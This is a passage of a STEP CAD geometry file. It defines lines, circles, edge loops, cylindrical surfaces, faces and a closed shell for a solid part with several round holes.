1,#442,#443,#444,#445,#446,#447,#448,#449,#450,\r\n#451,#452,#453,#454,#455,#456,#457,#458,#459,#460,#461,#462));\r\n#86=EDGE_LOOP('',(#463));\r\n#87=LINE('',#714,#132);\r\n#88=LINE('',#717,#133);\r\n#89=LINE('',#720,#134);\r\n#90=LINE('',#722,#135);\r\n#91=LINE('',#723,#136);\r\n#92=LINE('',#726,#137);\r\n#93=LINE('',#730,#138);\r\n#94=LINE('',#734,#139);\r\n#95=LINE('',#738,#140);\r\n#96=LINE('',#742,#141);\r\n#97=LINE('',#748,#142);\r\n#98=LINE('',#752,#143);\r\n#99=LINE('',#756,#144);\r\n#100=LINE('',#760,#145);\r\n#101=LINE('',#764,#146);\r\n#102=LINE('',#771,#147);\r\n#103=LINE('',#774,#148);\r\n#104=LINE('',#775,#149);\r\n#105=LINE('',#779,#150);\r\n#106=LINE('',#782,#151);\r\n#107=LINE('',#783,#152);\r\n#108=LINE('',#788,#153);\r\n#109=LINE('',#789,#154);\r\n#110=LINE('',#792,#155);\r\n#111=LINE('',#793,#156);\r\n#112=LINE('',#798,#157);\r\n#113=LINE('',#799,#158);\r\n#114=LINE('',#801,#159);\r\n#115=LINE('',#806,#160);\r\n#116=LINE('',#807,#161);\r\n#117=LINE('',#810,#162);\r\n#118=LINE('',#811,#163);\r\n#119=LINE('',#814,#164);\r\n#120=LINE('',#817,#165);\r\n#121=LINE('',#819,#166);\r\n#122=LINE('',#822,#167);\r\n#123=LINE('',#825,#168);\r\n#124=LINE('',#827,#169);\r\n#125=LINE('',#830,#170);\r\n#126=LINE('',#833,#171);\r\n#127=LINE('',#835,#172);\r\n#128=LINE('',#838,#173);\r\n#129=LINE('',#841,#174);\r\n#130=LINE('',#846,#175);\r\n#131=LINE('',#850,#176);\r\n#132=VECTOR('',#563,1.5);\r\n#133=VECTOR('',#566,1.5);\r\n#134=VECTOR('',#569,90.4989623089514);\r\n#135=VECTOR('',#570,1.5);\r\n#136=VECTOR('',#571,90.4989623089514);\r\n#137=VECTOR('',#574,29.);\r\n#138=VECTOR('',#577,4.5);\r\n#139=VECTOR('',#580,11.);\r\n#140=VECTOR('',#583,4.50000000000001);\r\n#141=VECTOR('',#586,10.);\r\n#142=VECTOR('',#591,22.);\r\n#143=VECTOR('',#594,1.49999999999999);\r\n#144=VECTOR('',#597,11.);\r\n#145=VECTOR('',#600,0.810810192574953);\r\n#146=VECTOR('',#603,32.3170363388663);\r\n#147=VECTOR('',#612,1.5);\r\n#148=VECTOR('',#615,1.5);\r\n#149=VECTOR('',#616,32.3170363388663);\r\n#150=VECTOR('',#621,1.5);\r\n#151=VECTOR('',#624,1.5);\r\n#152=VECTOR('',#625,0.810810192574953);\r\n#153=VECTOR('',#630,1.5);\r\n#154=VECTOR('',#631,1.5);\r\n#155=VECTOR('',#634,1.5);\r\n#156=VECTOR('',#635,22.);\r\n#157=VECTOR('',#640,1.5);\r\n#158=VECTOR('',#641,1.5);\r\n#159=VECTOR('',#644,29.);\r\n#160=VECTOR('',#649,1.5);\r\n#161=VECTOR('',#650,1.5);\r\n#162=VECTOR('',#653,10.);\r\n#163=VECTOR('',#654,1.5);\r\n#164=VECTOR('',#657,1.5);\r\n#165=VECTOR('',#660,1.5);\r\n#166=VECTOR('',#663,4.5);\r\n#167=VECTOR('',#666,1.5);\r\n#168=VECTOR('',#669,1.5);\r\n#169=VECTOR('',#672,11.);\r\n#170=VECTOR('',#675,1.5);\r\n#171=VECTOR('',#678,1.5);\r\n#172=VECTOR('',#681,1.49999999999999);\r\n#173=VECTOR('',#684,1.5);\r\n#174=VECTOR('',#689,11.);\r\n#175=VECTOR('',#696,4.50000000000001);\r\n#176=VECTOR('',#701,1.5);\r\n#177=CIRCLE('',#506,5.);\r\n#178=CIRCLE('',#507,5.);\r\n#179=CIRCLE('',#510,1.);\r\n#180=CIRCLE('',#511,0.5);\r\n#181=CIRCLE('',#512,0.5);\r\n#182=CIRCLE('',#513,1.);\r\n#183=CIRCLE('',#514,57.);\r\n#184=CIRCLE('',#515,20.);\r\n#185=CIRCLE('',#516,1.);\r\n#186=CIRCLE('',#517,0.5);\r\n#187=CIRCLE('',#518,0.5);\r\n#188=CIRCLE('',#519,1.);\r\n#189=CIRCLE('',#520,5.);\r\n#190=CIRCLE('',#521,10.);\r\n#191=CIRCLE('',#523,5.);\r\n#192=CIRCLE('',#526,1.);\r\n#193=CIRCLE('',#529,1.);\r\n#194=CIRCLE('',#532,1.);\r\n#195=CIRCLE('',#535,1.);\r\n#196=CIRCLE('',#538,0.5);\r\n#197=CIRCLE('',#541,0.5);\r\n#198=CIRCLE('',#544,0.5);\r\n#199=CIRCLE('',#547,0.5);\r\n#200=CIRCLE('',#550,10.);\r\n#201=CIRCLE('',#553,57.);\r\n#202=CIRCLE('',#555,20.);\r\n#203=VERTEX_POINT('',#710);\r\n#204=VERTEX_POINT('',#711);\r\n#205=VERTEX_POINT('',#713);\r\n#206=VERTEX_POINT('',#715);\r\n#207=VERTEX_POINT('',#719);\r\n#208=VERTEX_POINT('',#721);\r\n#209=VERTEX_POINT('',#725);\r\n#210=VERTEX_POINT('',#727);\r\n#211=VERTEX_POINT('',#729);\r\n#212=VERTEX_POINT('',#731);\r\n#213=VERTEX_POINT('',#733);\r\n#214=VERTEX_POINT('',#735);\r\n#215=VERTEX_POINT('',#737);\r\n#216=VERTEX_POINT('',#739);\r\n#217=VERTEX_POINT('',#741);\r\n#218=VERTEX_POINT('',#743);\r\n#219=VERTEX_POINT('',#745);\r\n#220=VERTEX_POINT('',#747);\r\n#221=VERTEX_POINT('',#749);\r\n#222=VERTEX_POINT('',#751);\r\n#223=VERTEX_POINT('',#753);\r\n#224=VERTEX_POINT('',#755);\r\n#225=VERTEX_POINT('',#757);\r\n#226=VERTEX_POINT('',#759);\r\n#227=VERTEX_POINT('',#761);\r\n#228=VERTEX_POINT('',#763);\r\n#229=VERTEX_POINT('',#766);\r\n#230=VERTEX_POINT('',#769);\r\n#231=VERTEX_POINT('',#773);\r\n#232=VERTEX_POINT('',#777);\r\n#233=VERTEX_POINT('',#781);\r\n#234=VERTEX_POINT('',#785);\r\n#235=VERTEX_POINT('',#786);\r\n#236=VERTEX_POINT('',#791);\r\n#237=VERTEX_POINT('',#795);\r\n#238=VERTEX_POINT('',#796);\r\n#239=VERTEX_POINT('',#803);\r\n#240=VERTEX_POINT('',#804);\r\n#241=VERTEX_POINT('',#809);\r\n#242=VERTEX_POINT('',#813);\r\n#243=VERTEX_POINT('',#815);\r\n#244=VERTEX_POINT('',#821);\r\n#245=VERTEX_POINT('',#823);\r\n#246=VERTEX_POINT('',#829);\r\n#247=VERTEX_POINT('',#831);\r\n#248=VERTEX_POINT('',#837);\r\n#249=VERTEX_POINT('',#843);\r\n#250=VERTEX_POINT('',#848);\r\n#251=EDGE_CURVE('',#203,#204,#177,.T.);\r\n#252=EDGE_CURVE('',#204,#205,#87,.T.);\r\n#253=EDGE_CURVE('',#205,#206,#178,.T.);\r\n#254=EDGE_CURVE('',#206,#203,#88,.T.);\r\n#255=EDGE_CURVE('',#206,#207,#89,.T.);\r\n#256=EDGE_CURVE('',#208,#207,#90,.T.);\r\n#257=EDGE_CURVE('',#203,#208,#91,.T.);\r\n#258=EDGE_CURVE('',#209,#205,#92,.T.);\r\n#259=EDGE_CURVE('',#210,#209,#179,.T.);\r\n#260=EDGE_CURVE('',#211,#210,#93,.T.);\r\n#261=EDGE_CURVE('',#212,#211,#180,.T.);\r\n#262=EDGE_CURVE('',#213,#212,#94,.T.);\r\n#263=EDGE_CURVE('',#214,#213,#181,.T.);\r\n#264=EDGE_CURVE('',#215,#214,#95,.T.);\r\n#265=EDGE_CURVE('',#216,#215,#182,.T.);\r\n#266=EDGE_CURVE('',#217,#216,#96,.T.);\r\n#267=EDGE_CURVE('',#218,#217,#183,.T.);\r\n#268=EDGE_CURVE('',#219,#218,#184,.T.);\r\n#269=EDGE_CURVE('',#220,#219,#97,.T.);\r\n#270=EDGE_CURVE('',#221,#220,#185,.T.);\r\n#271=EDGE_CURVE('',#222,#221,#98,.T.);\r\n#272=EDGE_CURVE('',#223,#222,#186,.T.);\r\n#273=EDGE_CURVE('',#224,#223,#99,.T.);\r\n#274=EDGE_CURVE('',#225,#224,#187,.T.);\r\n#275=EDGE_CURVE('',#226,#225,#100,.T.);\r\n#276=EDGE_CURVE('',#227,#226,#188,.T.);\r\n#277=EDGE_CURVE('',#228,#227,#101,.T.);\r\n#278=EDGE_CURVE('',#207,#228,#189,.T.);\r\n#279=EDGE_CURVE('',#229,#229,#190,.T.);\r\n#280=EDGE_CURVE('',#230,#208,#191,.T.);\r\n#281=EDGE_CURVE('',#228,#230,#102,.T.);\r\n#282=EDGE_CURVE('',#231,#227,#103,.T.);\r\n#283=EDGE_CURVE('',#230,#231,#104,.T.);\r\n#284=EDGE_CURVE('',#232,#231,#192,.T.);\r\n#285=EDGE_CURVE('',#226,#232,#105,.T.);\r\n#286=EDGE_CURVE('',#233,#225,#106,.T.);\r\n#287=EDGE_CURVE('',#232,#233,#107,.T.);\r\n#288=EDGE_CURVE('',#234,#235,#193,.T.);\r\n#289=EDGE_CURVE('',#235,#221,#108,.T.);\r\n#290=EDGE_CURVE('',#220,#234,#109,.T.);\r\n#291=EDGE_CURVE('',#219,#236,#110,.T.);\r\n#292=EDGE_CURVE('',#234,#236,#111,.T.);\r\n#293=EDGE_CURVE('',#237,#238,#194,.T.);\r\n#294=EDGE_CURVE('',#238,#210,#112,.T.);\r\n#295=EDGE_CURVE('',#209,#237,#113,.T.);\r\n#296=EDGE_CURVE('',#237,#204,#114,.T.);\r\n#297=EDGE_CURVE('',#239,#240,#195,.T.);\r\n#298=EDGE_CURVE('',#240,#216,#115,.T.);\r\n#299=EDGE_CURVE('',#215,#239,#116,.T.);\r\n#300=EDGE_CURVE('',#241,#240,#117,.T.);\r\n#301=EDGE_CURVE('',#217,#241,#118,.T.);\r\n#302=EDGE_CURVE('',#211,#242,#119,.T.);\r\n#303=EDGE_CURVE('',#242,#243,#196,.T.);\r\n#304=EDGE_CURVE('',#243,#212,#120,.T.);\r\n#305=EDGE_CURVE('',#242,#238,#121,.T.);\r\n#306=EDGE_CURVE('',#213,#244,#122,.T.);\r\n#307=EDGE_CURVE('',#244,#245,#197,.T.);\r\n#308=EDGE_CURVE('',#245,#214,#123,.T.);\r\n#309=EDGE_CURVE('',#244,#243,#124,.T.);\r\n#310=EDGE_CURVE('',#222,#246,#125,.T.);\r\n#311=EDGE_CURVE('',#246,#247,#198,.T.);\r\n#312=EDGE_CURVE('',#247,#223,#126,.T.);\r\n#313=EDGE_CURVE('',#246,#235,#127,.T.);\r\n#314=EDGE_CURVE('',#224,#248,#128,.T.);\r\n#315=EDGE_CURVE('',#248,#233,#199,.T.);\r\n#316=EDGE_CURVE('',#248,#247,#129,.T.);\r\n#317=EDGE_CURVE('',#249,#249,#200,.T.);\r\n#318=EDGE_CURVE('',#239,#245,#130,.T.);\r\n#319=EDGE_CURVE('',#250,#241,#201,.T.);\r\n#320=EDGE_CURVE('',#218,#250,#131,.T.);\r\n#321=EDGE_CURVE('',#236,#250,#202,.T.);\r\n#322=ORIENTED_EDGE('',*,*,#251,.T.);\r\n#323=ORIENTED_EDGE('',*,*,#252,.T.);\r\n#324=ORIENTED_EDGE('',*,*,#253,.T.);\r\n#325=ORIENTED_EDGE('',*,*,#254,.T.);\r\n#326=ORIENTED_EDGE('',*,*,#254,.F.);\r\n#327=ORIENTED_EDGE('',*,*,#255,.T.);\r\n#328=ORIENTED_EDGE('',*,*,#256,.F.);\r\n#329=ORIENTED_EDGE('',*,*,#257,.F.);\r\n#330=ORIENTED_EDGE('',*,*,#253,.F.);\r\n#331=ORIENTED_EDGE('',*,*,#258,.F.);\r\n#332=ORIENTED_EDGE('',*,*,#259,.F.);\r\n#333=ORIENTED_EDGE('',*,*,#260,.F.);\r\n#334=ORIENTED_EDGE('',*,*,#261,.F.);\r\n#335=ORIENTED_EDGE('',*,*,#262,.F.);\r\n#336=ORIENTED_EDGE('',*,*,#263,.F.);\r\n#337=ORIENTED_EDGE('',*,*,#264,.F.);\r\n#338=ORIENTED_EDGE('',*,*,#265,.F.);\r\n#339=ORIENTED_EDGE('',*,*,#266,.F.);\r\n#340=ORIENTED_EDGE('',*,*,#267,.F.);\r\n#341=ORIENTED_EDGE('',*,*,#268,.F.);\r\n#342=ORIENTED_EDGE('',*,*,#269,.F.);\r\n#343=ORIENTED_EDGE('',*,*,#270,.F.);\r\n#344=ORIENTED_EDGE('',*,*,#271,.F.);\r\n#345=ORIENTED_EDGE('',*,*,#272,.F.);\r\n#346=ORIENTED_EDGE('',*,*,#273,.F.);\r\n#347=ORIENTED_EDGE('',*,*,#274,.F.);\r\n#348=ORIENTED_EDGE('',*,*,#275,.F.);\r\n#349=ORIENTED_EDGE('',*,*,#276,.F.);\r\n#350=ORIENTED_EDGE('',*,*,#277,.F.);\r\n#351=ORIENTED_EDGE('',*,*,#278,.F.);\r\n#352=ORIENTED_EDGE('',*,*,#255,.F.);\r\n#353=ORIENTED_EDGE('',*,*,#279,.T.);\r\n#354=ORIENTED_EDGE('',*,*,#280,.T.);\r\n#355=ORIENTED_EDGE('',*,*,#256,.T.);\r\n#356=ORIENTED_EDGE('',*,*,#278,.T.);\r\n#357=ORIENTED_EDGE('',*,*,#281,.T.);\r\n#358=ORIENTED_EDGE('',*,*,#281,.F.);\r\n#359=ORIENTED_EDGE('',*,*,#277,.T.);\r\n#360=ORIENTED_EDGE('',*,*,#282,.F.);\r\n#361=ORIENTED_EDGE('',*,*,#283,.F.);\r\n#362=ORIENTED_EDGE('',*,*,#284,.T.);\r\n#363=ORIENTED_EDGE('',*,*,#282,.T.);\r\n#364=ORIENTED_EDGE('',*,*,#276,.T.);\r\n#365=ORIENTED_EDGE('',*,*,#285,.T.);\r\n#366=ORIENTED_EDGE('',*,*,#285,.F.);\r\n#367=ORIENTED_EDGE('',*,*,#275,.T.);\r\n#368=ORIENTED_EDGE('',*,*,#286,.F.);\r\n#369=ORIENTED_EDGE('',*,*,#287,.F.);\r\n#370=ORIENTED_EDGE('',*,*,#288,.T.);\r\n#371=ORIENTED_EDGE('',*,*,#289,.T.);\r\n#372=ORIENTED_EDGE('',*,*,#270,.T.);\r\n#373=ORIENTED_EDGE('',*,*,#290,.T.);\r\n#374=ORIENTED_EDGE('',*,*,#290,.F.);\r\n#375=ORIENTED_EDGE('',*,*,#269,.T.);\r\n#376=ORIENTED_EDGE('',*,*,#291,.T.);\r\n#377=ORIENTED_EDGE('',*,*,#292,.F.);\r\n#378=ORIENTED_EDGE('',*,*,#293,.T.);\r\n#379=ORIENTED_EDGE('',*,*,#294,.T.);\r\n#380=ORIENTED_EDGE('',*,*,#259,.T.);\r\n#381=ORIENTED_EDGE('',*,*,#295,.T.);\r\n#382=ORIENTED_EDGE('',*,*,#252,.F.);\r\n#383=ORIENTED_EDGE('',*,*,#296,.F.);\r\n#384=ORIENTED_EDGE('',*,*,#295,.F.);\r\n#385=ORIENTED_EDGE('',*,*,#258,.T.);\r\n#386=ORIENTED_EDGE('',*,*,#297,.T.);\r\n#387=ORIENTED_EDGE('',*,*,#298,.T.);\r\n#388=ORIENTED_EDGE('',*,*,#265,.T.);\r\n#389=ORIENTED_EDGE('',*,*,#299,.T.);\r\n#390=ORIENTED_EDGE('',*,*,#298,.F.);\r\n#391=ORIENTED_EDGE('',*,*,#300,.F.);\r\n#392=ORIENTED_EDGE('',*,*,#301,.F.);\r\n#393=ORIENTED_EDGE('',*,*,#266,.T.);\r\n#394=ORIENTED_EDGE('',*,*,#261,.T.);\r\n#395=ORIENTED_EDGE('',*,*,#302,.T.);\r\n#396=ORIENTED_EDGE('',*,*,#303,.T.);\r\n#397=ORIENTED_EDGE('',*,*,#304,.T.);\r\n#398=ORIENTED_EDGE('',*,*,#294,.F.);\r\n#399=ORIENTED_EDGE('',*,*,#305,.F.);\r\n#400=ORIENTED_EDGE('',*,*,#302,.F.);\r\n#401=ORIENTED_EDGE('',*,*,#260,.T.);\r\n#402=ORIENTED_EDGE('',*,*,#263,.T.);\r\n#403=ORIENTED_EDGE('',*,*,#306,.T.);\r\n#404=ORIENTED_EDGE('',*,*,#307,.T.);\r\n#405=ORIENTED_EDGE('',*,*,#308,.T.);\r\n#406=ORIENTED_EDGE('',*,*,#304,.F.);\r\n#407=ORIENTED_EDGE('',*,*,#309,.F.);\r\n#408=ORIENTED_EDGE('',*,*,#306,.F.);\r\n#409=ORIENTED_EDGE('',*,*,#262,.T.);\r\n#410=ORIENTED_EDGE('',*,*,#272,.T.);\r\n#411=ORIENTED_EDGE('',*,*,#310,.T.);\r\n#412=ORIENTED_EDGE('',*,*,#311,.T.);\r\n#413=ORIENTED_EDGE('',*,*,#312,.T.);\r\n#414=ORIENTED_EDGE('',*,*,#289,.F.);\r\n#415=ORIENTED_EDGE('',*,*,#313,.F.);\r\n#416=ORIENTED_EDGE('',*,*,#310,.F.);\r\n#417=ORIENTED_EDGE('',*,*,#271,.T.);\r\n#418=ORIENTED_EDGE('',*,*,#274,.T.);\r\n#419=ORIENTED_EDGE('',*,*,#314,.T.);\r\n#420=ORIENTED_EDGE('',*,*,#315,.T.);\r\n#421=ORIENTED_EDGE('',*,*,#286,.T.);\r\n#422=ORIENTED_EDGE('',*,*,#312,.F.);\r\n#423=ORIENTED_EDGE('',*,*,#316,.F.);\r\n#424=ORIENTED_EDGE('',*,*,#314,.F.);\r\n#425=ORIENTED_EDGE('',*,*,#273,.T.);\r\n#426=ORIENTED_EDGE('',*,*,#317,.F.);\r\n#427=ORIENTED_EDGE('',*,*,#279,.F.);\r\n#428=ORIENTED_EDGE('',*,*,#299,.F.);\r\n#429=ORIENTED_EDGE('',*,*,#264,.T.);\r\n#430=ORIENTED_EDGE('',*,*,#308,.F.);\r\n#431=ORIENTED_EDGE('',*,*,#318,.F.);\r\n#432=ORIENTED_EDGE('',*,*,#267,.T.);\r\n#433=ORIENTED_EDGE('',*,*,#301,.T.);\r\n#434=ORIENTED_EDGE('',*,*,#319,.F.);\r\n#435=ORIENTED_EDGE('',*,*,#320,.F.);\r\n#436=ORIENTED_EDGE('',*,*,#268,.T.);\r\n#437=ORIENTED_EDGE('',*,*,#320,.T.);\r\n#438=ORIENTED_EDGE('',*,*,#321,.F.);\r\n#439=ORIENTED_EDGE('',*,*,#291,.F.);\r\n#440=ORIENTED_EDGE('',*,*,#251,.F.);\r\n#441=ORIENTED_EDGE('',*,*,#257,.T.);\r\n#442=ORIENTED_EDGE('',*,*,#280,.F.);\r\n#443=ORIENTED_EDGE('',*,*,#283,.T.);\r\n#444=ORIENTED_EDGE('',*,*,#284,.F.);\r\n#445=ORIENTED_EDGE('',*,*,#287,.T.);\r\n#446=ORIENTED_EDGE('',*,*,#315,.F.);\r\n#447=ORIENTED_EDGE('',*,*,#316,.T.);\r\n#448=ORIENTED_EDGE('',*,*,#311,.F.);\r\n#449=ORIENTED_EDGE('',*,*,#313,.T.);\r\n#450=ORIENTED_EDGE('',*,*,#288,.F.);\r\n#451=ORIENTED_EDGE('',*,*,#292,.T.);\r\n#452=ORIENTED_EDGE('',*,*,#321,.T.);\r\n#453=ORIENTED_EDGE('',*,*,#319,.T.);\r\n#454=ORIENTED_EDGE('',*,*,#300,.T.);\r\n#455=ORIENTED_EDGE('',*,*,#297,.F.);\r\n#456=ORIENTED_EDGE('',*,*,#318,.T.);\r\n#457=ORIENTED_EDGE('',*,*,#307,.F.);\r\n#458=ORIENTED_EDGE('',*,*,#309,.T.);\r\n#459=ORIENTED_EDGE('',*,*,#303,.F.);\r\n#460=ORIENTED_EDGE('',*,*,#305,.T.);\r\n#461=ORIENTED_EDGE('',*,*,#293,.F.);\r\n#462=ORIENTED_EDGE('',*,*,#296,.T.);\r\n#463=ORIENTED_EDGE('',*,*,#317,.T.);\r\n#464=CYLINDRICAL_SURFACE('',#505,5.);\r\n#465=CYLINDRICAL_SURFACE('',#522,5.);\r\n#466=CYLINDRICAL_SURFACE('',#525,1.);\r\n#467=CYLINDRICAL_SURFACE('',#528,1.);\r\n#468=CYLINDRICAL_SURFACE('',#531,1.);\r\n#469=CYLINDRICAL_SURFACE('',#534,1.);\r\n#470=CYLINDRICAL_SURFACE('',#537,0.5);\r\n#471=CYLINDRICAL_SURFACE('',#540,0.5);\r\n#472=CYLINDRICAL_SURFACE('',#543,0.5);\r\n#473=CYLINDRICAL_SURFACE('',#546,0.5);\r\n#474=CYLINDRICAL_SURFACE('',#549,10.);\r\n#475=CYLINDRICAL_SURFACE('',#552,57.);\r\n#476=CYLINDRICAL_SURFACE('',#554,20.);\r\n#477=ADVANCED_FACE('',(#32),#464,.T.);\r\n#478=ADVANCED_FACE('',(#33),#19,.T.);\r\n#479=ADVANCED_FACE('',(#34,#14),#20,.F.);\r\n#480=ADVANCED_FACE('',(#35),#465,.T.);\r\n#481=ADVANCED_FACE('',(#36),#21,.T.);\r\n#482=ADVANCED_FACE('',(#37),#466,.T.);\r\n#483=ADVANCED_FACE('',(#38),#22,.T.);\r\n#484=ADVANCED_FACE('',(#39),#467,.T.);\r\n#485=ADVANCED_FACE('',(#40),#23,.T.);\r\n#486=ADVANCED_FACE('',(#41),#468,.T.);\r\n#487=ADVANCED_FACE('',(#42),#24,.T.);\r\n#488=ADVANCED_FACE('',(#43),#469,.T.);\r\n#489=ADVANCED_FACE('',(#44),#25,.T.);\r\n#490=ADVANCED_FACE('',(#45),#470,.F.);\r\n#491=ADVANCED_FACE('',(#46),#26,.T.);\r\n#492=ADVANCED_FACE('',(#47),#471,.F.);\r\n#493=ADVANCED_FACE('',(#48),#27,.T.);\r\n#494=ADVANCED_FACE('',(#49),#472,.F.);\r\n#495=ADVANCED_FACE('',(#50),#28,.T.);\r\n#496=ADVANCED_FACE('',(#51),#473,.F.);\r\n#497=ADVANCED_FACE('',(#52),#29,.T.);\r\n#498=ADVANCED_FACE('',(#53,#15),#474,.F.);\r\n#499=ADVANCED_FACE('',(#54),#30,.T.);\r\n#500=ADVANCED_FACE('',(#55),#475,.T.);\r\n#501=ADVANCED_FACE('',(#56),#476,.T.);\r\n#502=ADVANCED_FACE('',(#57,#16),#31,.T.);\r\n#503=CLOSED_SHELL('',(#477,#478,#479,#480,#481,#482,#483,#484,#485,#486,\r\n#487,#488,#489,#490,#491,#492,#493,#494,#495,#496,#497,#498,#499,#500,#501,\r\n#502));\r\n#504=AXIS2_PLACEMENT_3D('placement',#708,#557,#558);\r\n#505=AXIS2_PLACEMENT_3D('',#709,#559,#560);\r\n#506=AXIS2_PLACEMENT_3D('',#712,#561,#562);\r\n#507=AXIS2_PLACEMENT_3D('',#716,#564,#565);\r\n#508=AXIS2_PLACEMENT_3D('',#718,#567,#568);\r\n#509=AXIS2_PLACEMENT_3D('',#724,#572,#573);\r\n#510=AXIS2_PLACEMENT_3D('',#728,#575,#576);\r\n#511=AXIS2_PLACEMENT_3D('',#732,#578,#579);\r\n#512=AXIS2_PLACEMENT_3D('',#736,#581,#582);\r\n#513=AXIS2_PLACEMENT_3D('',#740,#584,#585);\r\n#514=AXIS2_PLACEMENT_3D('',#744,#587,#588);\r\n#515=AXIS2_PLACEMENT_3D('',#746,#589,#590);\r\n#516=AXIS2_PLACEMENT_3D('',#750,#592,#593);\r\n#517=AXIS2_PLACEMENT_3D('',#754,#595,#596);\r\n#518=AXIS2_PLACEMENT_3D('',#758,#598,#599);\r\n#519=AXIS2_PLACEMENT_3D('',#762,#601,#602);\r\n#520=AXIS2_PLACEMENT_3D('',#765,#604,#605);\r\n#521=AXIS2_PLACEMENT_3D('',#767,#606,#607);\r\n#522=AXIS2_PLACEMENT_3D('',#768,#608,#609);\r\n#523=AXIS2_PLACEMENT_3D('',#770,#610,#611);\r\n#524=AXIS2_PLACEMENT_3D('',#772,#613,#614);\r\n#525=AXIS2_PLACEMENT_3D('',#776,#617,#618);\r\n#526=AXIS2_PLACEMENT_3D('',#778,#619,#620);\r\n#527=AXIS2_PLACEMENT_3D('',#780,#622,#623);\r\n#528=AXIS2_PLACEMENT_3D('',#784,#626,#627);\r\n#529=AXIS2_PLACEMENT_3D('',#787,#628,#629);\r\n#530=AXIS2_PLACEMENT_3D('',#790,#632,#633);\r\n#531=AXIS2_PLACEMENT_3D('',#794,#636,#637);\r\n#532=AXIS2_PLACEMENT_3D('',#797,#638,#639);\r\n#533=AXIS2_PLACEMENT_3D('',#800,#642,#643);\r\n#534=AXIS2_PLACEMENT_3D('',#802,#645,#646);\r\n#535=AXIS2_PLACEMENT_3D('',#805,#647,#648);\r\n#536=AXIS2_PLACEMENT_3D('',#808,#651,#652);\r\n#537=AXIS2_PLACEMENT_3D('',#812,#655,#656);\r\n#538=AXIS2_PLACEMENT_3D('',#816,#658,#659);\r\n#539=AXIS2_PLACEMENT_3D('',#818,#661,#662);\r\n#540=AXIS2_PLACEMENT_3D('',#820,#664,#665);\r\n#541=AXIS2_PLACEMENT_3D('',#824,#667,#668);\r\n#542=AXIS2_PLACEMENT_3D('',#826,#670,#671);\r\n#543=AXIS2_PLACEMENT_3D('',#828,#673,#674);\r\n#544=AXIS2_PLACEMENT_3D('',#832,#676,#677);\r\n#545=AXIS2_PLACEMENT_3D('',#834,#679,#680);\r\n#546=AXIS2_PLACEMENT_3D('',#836,#682,#683);\r\n#547=AXIS2_PLACEMENT_3D('',#839,#685,#686);\r\n#548=AXIS2_PLACEMENT_3D('',#840,#687,#688);\r\n#549=AXIS2_PLACEMENT_3D('',#842,#690,#691);\r\n#550=AXIS2_PLACEMENT_3D('',#844,#692,#693);\r\n#551=AXIS2_PLACEMENT_3D('',#845,#694,#695);\r\n#552=AXIS2_PLACEMENT_3D('',#847,#697,#698);\r\n#553=AXIS2_PLACEMENT_3D('',#849,#699,#700);\r\n#554=AXIS2_PLACEMENT_3D('',#851,#702,#703);\r\n#555=AXIS2_PLACEMENT_3D('',#852,#704,#705);\r\n#556=AXIS2_PLACEMENT_3D('',#853,#706,#707);\r\n#557=DIRECTION('axis',(0.,0.,1.));\r\n#558=DIRECTION('refdir',(1.,0.,0.));\r\n#559=DIRECTION('center_axis',(0.,0.,1.));\r\n#560=DIRECTION('ref_axis',(-0.707106781186547,-0.707106781186547,0.));\r\n#561=DIRECTION('center_axis',(0.,0.,-1.));\r\n#562=DIRECTION('ref_axis',(-0.707106781186547,-0.707106781186547,0.));\r\n#563=DIRECTION('',(0.,0.,-1.));\r\n#564=DIRECTION('center_axis',(0.,0.,1.));\r\n#565=DIRECTION('ref_axis',(-0.707106781186547,-0.707106781186547,0.));\r\n#566=DIRECTION('',(0.,0.,1.));\r\n#567=DIRECTION('center_axis',(0.,-1.,0.));\r\n#568=DIRECTION('ref_axis',(1.,0.,0.));\r\n#569=DIRECTION('',(1.,0.,0.));\r\n#570=DIRECTION('',(0.,0.,-1.));\r\n#571=DIRECTION('',(1.,0.,0.));\r\n#572=DIRECTION('center_axis',(0.,0.,1.));\r\n#573=DIRECTION('ref_axis',(1.,0.,0.));\r\n#574=DIRECTION('',(0.,-1.,0.));\r\n#575=DIRECTION('center_axis',(0.,0.,1.));\r\n#576=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#577=DIRECTION('',(-1.,7.40148683083437E-16,0.));\r\n#578=DIRECTION('center_axis',(0.,0.,-1.));\r\n#579=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#580=DIRECTION('',(0.,-1.,0.));\r\n#581=DIRECTION('center_axis',(0.,0.,-1.));\r\n#582=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#583=DIRECTION('',(1.,3.70074341541718E-16,0.));\r\n#584=DIRECTION('center_axis',(0.,0.,1.));\r\n#585=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#586=DIRECTION('',(0.,-1.,0.));\r\n#587=DIRECTION('center_axis',(0.,0.,1.));\r\n#588=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#589=DIRECTION('center_axis',(0.,0.,1.));\r\n#590=DIRECTION('ref_axis',(1.,4.44089209850063E-16,0.));\r\n#591=DIRECTION('',(-3.86164530304403E-16,1.,0.));\r\n#592=DIRECTION('center_axis',(0.,0.,1.));\r\n#593=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#594=DIRECTION('',(1.,0.,0.));\r\n#595=DIRECTION('center_axis',(0.,0.,-1.));\r\n#596=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#597=DIRECTION('',(0.,1.,0.));\r\n#598=DIRECTION('center_axis',(0.,0.,-1.));\r\n#599=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#600=DIRECTION('',(-1.,0.,0.));\r\n#601=DIRECTION('center_axis',(0.,0.,1.));\r\n#602=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#603=DIRECTION('',(0.342020143325668,0.939692620785909,0.));\r\n#604=DIRECTION('center_axis',(0.,0.,1.));\r\n#605=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#606=DIRECTION('center_axis',(0.,0.,1.));\r\n#607=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#608=DIRECTION('center_axis',(0.,0.,1.));\r\n#609=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#610=DIRECTION('center_axis',(0.,0.,-1.));\r\n#611=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#612=DIRECTION('',(0.,0.,1.));\r\n#613=DIRECTION('center_axis',(0.939692620785909,-0.342020143325668,0.));\r\n#614=DIRECTION('ref_axis',(0.3420